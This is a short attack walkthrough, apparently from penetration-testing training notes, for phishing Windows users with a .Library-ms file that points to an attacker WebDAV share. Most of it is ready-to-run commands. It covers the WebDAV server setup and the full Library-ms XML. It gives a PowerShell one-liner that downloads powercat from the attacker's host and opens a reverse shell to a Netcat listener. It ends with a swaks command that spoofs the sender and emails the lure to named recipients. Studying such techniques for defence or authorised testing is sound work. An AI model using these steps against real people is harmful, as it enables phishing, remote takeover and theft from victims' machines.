Windows Library-ms Client-Side Attack
exploitationwindowstool
Summary
Phish a Windows user with a .Library-ms file pointing at an attacker WebDAV share, chaining a malicious shortcut that downloads powercat for a reverse shell.
Walkthrough
This client-side attack emails a victim a Windows .Library-ms file that points to an attacker-controlled WebDAV share; a paired shortcut on the share downloads powercat and returns a reverse shell.
Steps
- Set up the WebDAV share on Kali with
wsgidav(anonymous auth) serving/home/kali/beyond/webdav/. - Build the Library file (
config.Library-ms) whose<url>points at your WebDAV host, and save it to/home/kali/beyond. - Create a shortcut on the share that runs the powercat one-liner; when double-clicked it pulls
powercat.ps1and connects back for a shell. - Serve powercat over HTTP with
python3 -m http.server 8000. - Start a Netcat listener on port 4444 to catch the reverse shell.
- Send the email with
swaks, attachingconfig.Library-ms. Provide recipients with-t, the spoofed sender with--from, the SMTP server with--server, subject/body via--header/--body, and-apto enable password authentication. - Wait for the victim to open the Library and trigger the shortcut.
Commands
bash
mkdir /home/kali/beyond/webdav /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/
other
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<IP></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>powershell
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>:8000/powercat.ps1'); powercat -c <IP> -p 4444 -e powershell"bash
python3 -m http.server 8000
bash
nc -nlvp 4444
bash
sudo swaks -t daniela@beyond.com -t marcus@beyond.com \ --from john@beyond.com --attach @config.Library-ms --server <IP> \ --body @body.txt --header "Subject: Staging Script" --suppress-data -ap